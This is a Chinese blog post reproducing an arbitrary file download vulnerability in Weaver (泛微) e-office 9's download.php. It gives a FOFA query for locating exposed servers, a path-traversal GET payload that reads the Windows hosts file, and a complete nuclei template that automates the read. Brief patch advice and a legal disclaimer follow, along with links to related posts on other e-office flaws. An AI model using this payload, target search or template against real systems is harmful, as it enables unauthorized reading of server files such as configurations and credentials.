泛微e-office download.php存在任意文件下载

最新推荐文章于 2024-08-01 10:59:33 发布
最新推荐文章于 2024-08-01 10:59:33 发布
阅读量376 收藏 5
点赞数 4
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/137102347
版权

0x01 应用介绍

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案

0x02 影响版本及语法特征

泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”

0x03 漏洞复现

payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
直接使用get请求拼接该payload即可下载目标主机hosts文件

图片

下载完成后打开文件查看

图片


下载服务器文件复现成功

nuclei

id: fanwei-E-Office-file-read
info:
  name: fanwei-E-Office-file-read
  author: fanwei-E-Office-file-read
  severity: critical
  tags: fanwei

http:
  - raw:
    - |
        GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "127.0.0.1"
      - type: status
        status:
          - 200

图片

修复建议

使用最新版本的应用

限制漏洞路径的访问

 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

黑客大佬
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微E-Office任意文件上传漏洞复现
0xSec
08-12 2670
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
泛微 E-Office download.php 任意文件读取漏洞
CommputerMac的博客
10-21 413
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。该系统download.php存在任意文件下载漏洞,通过该漏洞攻击者可以下载服务上任意文件。burp发包读取host文件。
Goby 漏洞发布|泛微E-office协同办公系统 download.php 文件 filename 参数文件读取漏洞
m0_46699477的博客
06-21 385
泛微E-office协同办公系统是一款专业的办公软件,是面向小型企业或团队的工作平台。 泛微E-office协同办公系统存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
泛微e-office download.php任意文件
zkaqlaoniao的博客
11-01 244
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
泛微E-Office敏感信息泄露和未授权访问漏洞
08-03 1779
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
CNVD-2021-49104——泛微E-Office文件上传漏洞
LiBai'S BLOG
11-28 8447
CNVD-2021-49104漏洞描述危害等级FOFA 语法影响版本漏洞复现修复建议 漏洞描述 泛微e-office泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。 危害等级 高危 文件上传可直接get webshell FOFA 语法 app="泛微-EOffice" 影响版本 泛微e-office V9.0 漏洞复现 构造请求上传文件即可 POST /general/index/U
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
03-02
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
泛微e-office_V10.0 短信插件.zip
11-17
"泛微e-office_V10.0 短信插件.docx"文件可能是关于这个短信插件的详细使用手册或者配置指南,包含了如何安装、配置、使用及常见问题的解决方法。对于系统管理员来说,这份文档至关重要,因为它将帮助他们充分利用这...
RCE和php文件上传
m0_71332744的博客
07-30 811
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 311
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 502
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 313
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
codeji的博客
07-31 238
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
最新发布
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 464
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
应急靶场(11):【玄机】日志分析-apache日志分析
OneMoreThink
07-30 448
题目提交当天访问次数最多的IP,即黑客IP黑客使用的浏览器指纹是什么,提交指纹的md5查看index.php页面被访问的次数,提交次数查看黑客IP访问了多少次,提交次数查看2023年8月03日8时这一个小时内有多少IP访问,提交次数靶场地址:https://xj.edisec.net/challenges/291、提交当天访问次数最多的IP,即黑客IP已知中间件是Linux上的Apache,常见日...
泛微 e-cology9 filedownload.jsp 任意文件读取
11-24
泛微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞并读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等数据。这种漏洞可能对企业的数据安全造成严重威胁,因此需要尽快得到修复。 修复这个漏洞的方法之一是及时升级软件版本,确保安装了最新的补丁程序。此外,也可以通过屏蔽 filedownload.jsp 文件或者限制其访问权限的方法来暂时防范该漏洞。另外,加强网络安全防护,限制外部访问和加密重要数据,也是保护系统安全的有效手段。同时,企业也应该加强对于软件漏洞的监测和应急处理能力,及时发现和处理类似问题,减少潜在的安全隐患。 总的来说,泛微 e-cology9 的 filedownload.jsp 任意文件读取漏洞可能对企业的数据和信息安全造成严重威胁,需要引起重视并及时采取措施加以修复和预防。企业需要全面加强系统的安全防护能力,加强漏洞管理和修复工作,以确保企业信息系统的安全稳定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值